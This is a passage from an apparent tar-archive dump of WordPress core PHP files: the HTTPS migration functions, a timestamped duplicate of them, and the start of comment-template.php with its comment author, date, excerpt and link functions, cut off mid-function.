* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration.php 0000666 00000011205 15224151220 0010403 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260606074445-20260621081103-20260621181046.php 0000666 00000011205 15224151220 0014737 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
comment-template-20260621145004.php 0000666 00000311351 15224151220 0012110 0 ustar 00 <?php
/**
* Comment template functions
*
* These functions are meant to live inside of the WordPress loop.
*
* @package WordPress
* @subpackage Template
*/
/**
* Retrieves the author of the current comment.
*
* If the comment has an empty comment_author field, then 'Anonymous' person is
* assumed.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to retrieve the author.
* Default current comment.
* @return string The comment author
*/
function get_comment_author( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
if ( ! empty( $comment->comment_ID ) ) {
$comment_id = $comment->comment_ID;
} elseif ( is_scalar( $comment_id ) ) {
$comment_id = (string) $comment_id;
} else {
$comment_id = '0';
}
if ( empty( $comment->comment_author ) ) {
$user = ! empty( $comment->user_id ) ? get_userdata( $comment->user_id ) : false;
if ( $user ) {
$comment_author = $user->display_name;
} else {
$comment_author = __( 'Anonymous' );
}
} else {
$comment_author = $comment->comment_author;
}
/**
* Filters the returned comment author name.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_id` and `$comment` parameters were added.
*
* @param string $comment_author The comment author's username.
* @param string $comment_id The comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_author', $comment_author, $comment_id, $comment );
}
/**
* Displays the author of the current comment.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to print the author.
* Default current comment.
*/
function comment_author( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
$comment_author = get_comment_author( $comment );
/**
* Filters the comment author's name for display.
*
* @since 1.2.0
* @since 4.1.0 The `$comment_id` parameter was added.
*
* @param string $comment_author The comment author's username.
* @param string $comment_id The comment ID as a numeric string.
*/
echo apply_filters( 'comment_author', $comment_author, $comment->comment_ID );
}
/**
* Retrieves the email of the author of the current comment.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to get the author's email.
* Default current comment.
* @return string The current comment author's email
*/
function get_comment_author_email( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
/**
* Filters the comment author's returned email address.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_id` and `$comment` parameters were added.
*
* @param string $comment_author_email The comment author's email address.
* @param string $comment_id The comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_author_email', $comment->comment_author_email, $comment->comment_ID, $comment );
}
/**
* Displays the email of the author of the current global $comment.
*
* Care should be taken to protect the email address and assure that email
* harvesters do not capture your commenter's email address. Most assume that
* their email address will not appear in raw form on the site. Doing so will
* enable anyone, including those that people don't want to get the email
* address and use it for their own means good and bad.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to print the author's email.
* Default current comment.
*/
function comment_author_email( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
$comment_author_email = get_comment_author_email( $comment );
/**
* Filters the comment author's email for display.
*
* @since 1.2.0
* @since 4.1.0 The `$comment_id` parameter was added.
*
* @param string $comment_author_email The comment author's email address.
* @param string $comment_id The comment ID as a numeric string.
*/
echo apply_filters( 'author_email', $comment_author_email, $comment->comment_ID );
}
/**
* Displays the HTML email link to the author of the current comment.
*
* Care should be taken to protect the email address and assure that email
* harvesters do not capture your commenter's email address. Most assume that
* their email address will not appear in raw form on the site. Doing so will
* enable anyone, including those that people don't want to get the email
* address and use it for their own means good and bad.
*
* @since 0.71
* @since 4.6.0 Added the `$comment` parameter.
*
* @param string $link_text Optional. Text to display instead of the comment author's email address.
* Default empty.
* @param string $before Optional. Text or HTML to display before the email link. Default empty.
* @param string $after Optional. Text or HTML to display after the email link. Default empty.
* @param int|WP_Comment $comment Optional. Comment ID or WP_Comment object. Default is the current comment.
*/
function comment_author_email_link( $link_text = '', $before = '', $after = '', $comment = null ) {
$link = get_comment_author_email_link( $link_text, $before, $after, $comment );
if ( $link ) {
echo $link;
}
}
/**
* Returns the HTML email link to the author of the current comment.
*
* Care should be taken to protect the email address and assure that email
* harvesters do not capture your commenter's email address. Most assume that
* their email address will not appear in raw form on the site. Doing so will
* enable anyone, including those that people don't want to get the email
* address and use it for their own means good and bad.
*
* @since 2.7.0
* @since 4.6.0 Added the `$comment` parameter.
*
* @param string $link_text Optional. Text to display instead of the comment author's email address.
* Default empty.
* @param string $before Optional. Text or HTML to display before the email link. Default empty.
* @param string $after Optional. Text or HTML to display after the email link. Default empty.
* @param int|WP_Comment $comment Optional. Comment ID or WP_Comment object. Default is the current comment.
* @return string HTML markup for the comment author email link. By default, the email address is obfuscated
* via the {@see 'comment_email'} filter with antispambot().
*/
function get_comment_author_email_link( $link_text = '', $before = '', $after = '', $comment = null ) {
$comment = get_comment( $comment );
/**
* Filters the comment author's email for display.
*
* Care should be taken to protect the email address and assure that email
* harvesters do not capture your commenter's email address.
*
* @since 1.2.0
* @since 4.1.0 The `$comment` parameter was added.
*
* @param string $comment_author_email The comment author's email address.
* @param WP_Comment $comment The comment object.
*/
$comment_author_email = apply_filters( 'comment_email', $comment->comment_author_email, $comment );
if ( ( ! empty( $comment_author_email ) ) && ( '@' !== $comment_author_email ) ) {
$display = ( '' !== $link_text ) ? $link_text : $comment_author_email;
$comment_author_email_link = $before . sprintf(
'<a href="%1$s">%2$s</a>',
esc_url( 'mailto:' . $comment_author_email ),
esc_html( $display )
) . $after;
return $comment_author_email_link;
} else {
return '';
}
}
/**
* Retrieves the HTML link to the URL of the author of the current comment.
*
* Both get_comment_author_url() and get_comment_author() rely on get_comment(),
* which falls back to the global comment variable if the $comment_id argument is empty.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to get the author's link.
* Default current comment.
* @return string The comment author name or HTML link for author's URL.
*/
function get_comment_author_link( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
if ( ! empty( $comment->comment_ID ) ) {
$comment_id = $comment->comment_ID;
} elseif ( is_scalar( $comment_id ) ) {
$comment_id = (string) $comment_id;
} else {
$comment_id = '0';
}
$comment_author_url = get_comment_author_url( $comment );
$comment_author = get_comment_author( $comment );
if ( empty( $comment_author_url ) || 'http://' === $comment_author_url ) {
$comment_author_link = $comment_author;
} else {
$rel_parts = array( 'ugc' );
if ( ! wp_is_internal_link( $comment_author_url ) ) {
$rel_parts = array_merge(
$rel_parts,
array( 'external', 'nofollow' )
);
}
/**
* Filters the rel attributes of the comment author's link.
*
* @since 6.2.0
*
* @param string[] $rel_parts An array of strings representing the rel tags
* which will be joined into the anchor's rel attribute.
* @param WP_Comment $comment The comment object.
*/
$rel_parts = apply_filters( 'comment_author_link_rel', $rel_parts, $comment );
$rel = implode( ' ', $rel_parts );
$rel = esc_attr( $rel );
// Empty space before 'rel' is necessary for later sprintf().
$rel = ! empty( $rel ) ? sprintf( ' rel="%s"', $rel ) : '';
$comment_author_link = sprintf(
'<a href="%1$s" class="url"%2$s>%3$s</a>',
$comment_author_url,
$rel,
$comment_author
);
}
/**
* Filters the comment author's link for display.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_author` and `$comment_id` parameters were added.
*
* @param string $comment_author_link The HTML-formatted comment author link.
* Empty for an invalid URL.
* @param string $comment_author The comment author's username.
* @param string $comment_id The comment ID as a numeric string.
*/
return apply_filters( 'get_comment_author_link', $comment_author_link, $comment_author, $comment_id );
}
/**
* Displays the HTML link to the URL of the author of the current comment.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to print the author's link.
* Default current comment.
*/
function comment_author_link( $comment_id = 0 ) {
echo get_comment_author_link( $comment_id );
}
/**
* Retrieves the IP address of the author of the current comment.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to get the author's IP address.
* Default current comment.
* @return string Comment author's IP address, or an empty string if it's not available.
*/
function get_comment_author_IP( $comment_id = 0 ) { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid
$comment = get_comment( $comment_id );
/**
* Filters the comment author's returned IP address.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_id` and `$comment` parameters were added.
*
* @param string $comment_author_ip The comment author's IP address, or an empty string if it's not available.
* @param string $comment_id The comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_author_IP', $comment->comment_author_IP, $comment->comment_ID, $comment ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
}
/**
* Displays the IP address of the author of the current comment.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to print the author's IP address.
* Default current comment.
*/
function comment_author_IP( $comment_id = 0 ) { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid
echo esc_html( get_comment_author_IP( $comment_id ) );
}
/**
* Retrieves the URL of the author of the current comment, not linked.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to get the author's URL.
* Default current comment.
* @return string Comment author URL, if provided, an empty string otherwise.
*/
function get_comment_author_url( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
$comment_author_url = '';
$comment_id = 0;
if ( ! empty( $comment ) ) {
$comment_author_url = ( 'http://' === $comment->comment_author_url ) ? '' : $comment->comment_author_url;
$comment_author_url = esc_url( $comment_author_url, array( 'http', 'https' ) );
$comment_id = $comment->comment_ID;
}
/**
* Filters the comment author's URL.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_id` and `$comment` parameters were added.
*
* @param string $comment_author_url The comment author's URL, or an empty string.
* @param string|int $comment_id The comment ID as a numeric string, or 0 if not found.
* @param WP_Comment|null $comment The comment object, or null if not found.
*/
return apply_filters( 'get_comment_author_url', $comment_author_url, $comment_id, $comment );
}
/**
* Displays the URL of the author of the current comment, not linked.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to print the author's URL.
* Default current comment.
*/
function comment_author_url( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
$comment_author_url = get_comment_author_url( $comment );
/**
* Filters the comment author's URL for display.
*
* @since 1.2.0
* @since 4.1.0 The `$comment_id` parameter was added.
*
* @param string $comment_author_url The comment author's URL.
* @param string $comment_id The comment ID as a numeric string.
*/
echo apply_filters( 'comment_url', $comment_author_url, $comment->comment_ID );
}
/**
* Retrieves the HTML link of the URL of the author of the current comment.
*
* $link_text parameter is only used if the URL does not exist for the comment
* author. If the URL does exist then the URL will be used and the $link_text
* will be ignored.
*
* Encapsulate the HTML link between the $before and $after. So it will appear
* in the order of $before, link, and finally $after.
*
* @since 1.5.0
* @since 4.6.0 Added the `$comment` parameter.
*
* @param string $link_text Optional. The text to display instead of the comment
* author's email address. Default empty.
* @param string $before Optional. The text or HTML to display before the email link.
* Default empty.
* @param string $after Optional. The text or HTML to display after the email link.
* Default empty.
* @param int|WP_Comment $comment Optional. Comment ID or WP_Comment object.
* Default is the current comment.
* @return string The HTML link between the $before and $after parameters.
*/
function get_comment_author_url_link( $link_text = '', $before = '', $after = '', $comment = 0 ) {
$comment_author_url = get_comment_author_url( $comment );
$display = ( '' !== $link_text ) ? $link_text : $comment_author_url;
$display = str_replace( 'http://www.', '', $display );
$display = str_replace( 'http://', '', $display );
if ( str_ends_with( $display, '/' ) ) {
$display = substr( $display, 0, -1 );
}
$comment_author_url_link = $before . sprintf(
'<a href="%1$s" rel="external">%2$s</a>',
$comment_author_url,
$display
) . $after;
/**
* Filters the comment author's returned URL link.
*
* @since 1.5.0
*
* @param string $comment_author_url_link The HTML-formatted comment author URL link.
*/
return apply_filters( 'get_comment_author_url_link', $comment_author_url_link );
}
/**
* Displays the HTML link of the URL of the author of the current comment.
*
* @since 0.71
* @since 4.6.0 Added the `$comment` parameter.
*
* @param string $link_text Optional. Text to display instead of the comment author's
* email address. Default empty.
* @param string $before Optional. Text or HTML to display before the email link.
* Default empty.
* @param string $after Optional. Text or HTML to display after the email link.
* Default empty.
* @param int|WP_Comment $comment Optional. Comment ID or WP_Comment object.
* Default is the current comment.
*/
function comment_author_url_link( $link_text = '', $before = '', $after = '', $comment = 0 ) {
echo get_comment_author_url_link( $link_text, $before, $after, $comment );
}
/**
* Generates semantic classes for each comment element.
*
* @since 2.7.0
* @since 4.4.0 Added the ability for `$comment` to also accept a WP_Comment object.
*
* @param string|string[] $css_class Optional. One or more classes to add to the class list.
* Default empty.
* @param int|WP_Comment $comment Optional. Comment ID or WP_Comment object. Default current comment.
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default current post.
* @param bool $display Optional. Whether to print or return the output.
* Default true.
* @return void|string Void if `$display` argument is true, comment classes if `$display` is false.
*/
function comment_class( $css_class = '', $comment = null, $post = null, $display = true ) {
// Separates classes with a single space, collates classes for comment DIV.
$css_class = 'class="' . implode( ' ', get_comment_class( $css_class, $comment, $post ) ) . '"';
if ( $display ) {
echo $css_class;
} else {
return $css_class;
}
}
/**
* Returns the classes for the comment div as an array.
*
* @since 2.7.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @global int $comment_alt
* @global int $comment_depth
* @global int $comment_thread_alt
*
* @param string|string[] $css_class Optional. One or more classes to add to the class list.
* Default empty.
* @param int|WP_Comment $comment_id Optional. Comment ID or WP_Comment object. Default current comment.
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default current post.
* @return string[] An array of classes.
*/
function get_comment_class( $css_class = '', $comment_id = null, $post = null ) {
global $comment_alt, $comment_depth, $comment_thread_alt;
$classes = array();
$comment = get_comment( $comment_id );
if ( ! $comment ) {
return $classes;
}
// Get the comment type (comment, trackback).
$classes[] = ( empty( $comment->comment_type ) ) ? 'comment' : $comment->comment_type;
// Add classes for comment authors that are registered users.
$user = $comment->user_id ? get_userdata( $comment->user_id ) : false;
if ( $user ) {
$classes[] = 'byuser';
$classes[] = 'comment-author-' . sanitize_html_class( $user->user_nicename, $comment->user_id );
// For comment authors who are the author of the post.
$_post = get_post( $post );
if ( $_post ) {
if ( $comment->user_id === $_post->post_author ) {
$classes[] = 'bypostauthor';
}
}
}
if ( empty( $comment_alt ) ) {
$comment_alt = 0;
}
if ( empty( $comment_depth ) ) {
$comment_depth = 1;
}
if ( empty( $comment_thread_alt ) ) {
$comment_thread_alt = 0;
}
if ( $comment_alt % 2 ) {
$classes[] = 'odd';
$classes[] = 'alt';
} else {
$classes[] = 'even';
}
++$comment_alt;
// Alt for top-level comments.
if ( 1 === $comment_depth ) {
if ( $comment_thread_alt % 2 ) {
$classes[] = 'thread-odd';
$classes[] = 'thread-alt';
} else {
$classes[] = 'thread-even';
}
++$comment_thread_alt;
}
$classes[] = "depth-$comment_depth";
if ( ! empty( $css_class ) ) {
if ( ! is_array( $css_class ) ) {
$css_class = preg_split( '#\s+#', $css_class );
}
$classes = array_merge( $classes, $css_class );
}
$classes = array_map( 'esc_attr', $classes );
/**
* Filters the returned CSS classes for the current comment.
*
* @since 2.7.0
*
* @param string[] $classes An array of comment classes.
* @param string[] $css_class An array of additional classes added to the list.
* @param string $comment_id The comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
* @param int|WP_Post $post The post ID or WP_Post object.
*/
return apply_filters( 'comment_class', $classes, $css_class, $comment->comment_ID, $comment, $post );
}
/**
* Retrieves the comment date of the current comment.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param string $format Optional. PHP date format. Defaults to the 'date_format' option.
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to get the date.
* Default current comment.
* @return string The comment's date.
*/
function get_comment_date( $format = '', $comment_id = 0 ) {
$comment = get_comment( $comment_id );
$_format = ! empty( $format ) ? $format : get_option( 'date_format' );
$comment_date = mysql2date( $_format, $comment->comment_date );
/**
* Filters the returned comment date.
*
* @since 1.5.0
*
* @param string|int $comment_date Formatted date string or Unix timestamp.
* @param string $format PHP date format.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_date', $comment_date, $format, $comment );
}
/**
* Displays the comment date of the current comment.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param string $format Optional. PHP date format. Defaults to the 'date_format' option.
* @param int|WP_Comment $comment_id WP_Comment or ID of the comment for which to print the date.
* Default current comment.
*/
function comment_date( $format = '', $comment_id = 0 ) {
echo get_comment_date( $format, $comment_id );
}
/**
* Retrieves the excerpt of the given comment.
*
* Returns a maximum of 20 words with an ellipsis appended if necessary.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to get the excerpt.
* Default current comment.
* @return string The possibly truncated comment excerpt.
*/
function get_comment_excerpt( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
if ( ! post_password_required( $comment->comment_post_ID ) ) {
$comment_text = strip_tags( str_replace( array( "\n", "\r" ), ' ', $comment->comment_content ) );
} else {
$comment_text = __( 'Password protected' );
}
/* translators: Maximum number of words used in a comment excerpt. */
$comment_excerpt_length = (int) _x( '20', 'comment_excerpt_length' );
/**
* Filters the maximum number of words used in the comment excerpt.
*
* @since 4.4.0
*
* @param int $comment_excerpt_length The amount of words you want to display in the comment excerpt.
*/
$comment_excerpt_length = apply_filters( 'comment_excerpt_length', $comment_excerpt_length );
$comment_excerpt = wp_trim_words( $comment_text, $comment_excerpt_length, '…' );
/**
* Filters the retrieved comment excerpt.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_id` and `$comment` parameters were added.
*
* @param string $comment_excerpt The comment excerpt text.
* @param string $comment_id The comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_excerpt', $comment_excerpt, $comment->comment_ID, $comment );
}
/**
* Displays the excerpt of the current comment.
*
* @since 1.2.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to print the excerpt.
* Default current comment.
*/
function comment_excerpt( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
$comment_excerpt = get_comment_excerpt( $comment );
/**
* Filters the comment excerpt for display.
*
* @since 1.2.0
* @since 4.1.0 The `$comment_id` parameter was added.
*
* @param string $comment_excerpt The comment excerpt text.
* @param string $comment_id The comment ID as a numeric string.
*/
echo apply_filters( 'comment_excerpt', $comment_excerpt, $comment->comment_ID );
}
/**
* Retrieves the comment ID of the current comment.
*
* @since 1.5.0
*
* @return string The comment ID as a numeric string.
*/
function get_comment_ID() { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid
$comment = get_comment();
$comment_id = ! empty( $comment->comment_ID ) ? $comment->comment_ID : '0';
/**
* Filters the returned comment ID.
*
* @since 1.5.0
* @since 4.1.0 The `$comment` parameter was added.
*
* @param string $comment_id The current comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_ID', $comment_id, $comment ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
}
/**
* Displays the comment ID of the current comment.
*
* @since 0.71
*/
function comment_ID() { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid
echo get_comment_ID();
}
/**
* Retrieves the link to a given comment.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment` to also accept a WP_Comment object. Added `$cpage` argument.
*
* @see get_page_of_comment()
*
* @global WP_Rewrite $wp_rewrite WordPress rewrite component.
* @global bool $in_comment_loop
*
* @param WP_Comment|int|null $comment Optional. Comment to retrieve. Default current comment.
* @param array $args {
* An array of optional arguments to override the defaults.
*
* @type string $type Passed to get_page_of_comment().
* @type int $page Current page of comments, for calculating comment pagination.
* @type int $per_page Per-page value for comment pagination.
* @type int $max_depth Passed to get_page_of_comment().
* @type int|string $cpage Value to use for the comment's "comment-page" or "cpage" value.
* If provided, this value overrides any value calculated from `$page`
* and `$per_page`.
* }
* @return string The permalink to the given comment.
*/
function get_comment_link( $comment = null, $args = array() ) {
global $wp_rewrite, $in_comment_loop;
$comment = get_comment( $comment );
// Back-compat.
if ( ! is_array( $args ) ) {
$args = array( 'page' => $args );
}
$defaults = array(
'type' => 'all',
'page' => '',
'per_page' => '',
'max_depth' => '',
'cpage' => null,
);
$args = wp_parse_args( $args, $defaults );
$comment_link = get_permalink( $comment->comment_post_ID );
// The 'cpage' param takes precedence.
if ( ! is_null( $args['cpage'] ) ) {
$cpage = $args['cpage'];
// No 'cpage' is provided, so we calculate one.
} else {
if ( '' === $args['per_page'] && get_option( 'page_comments' ) ) {
$args['per_page'] = get_option( 'comments_per_page' );
}
if ( empty( $args['per_page'] ) ) {
$args['per_page'] = 0;
$args['page'] = 0;
}
$cpage = $args['page'];
if ( '' === $cpage ) {
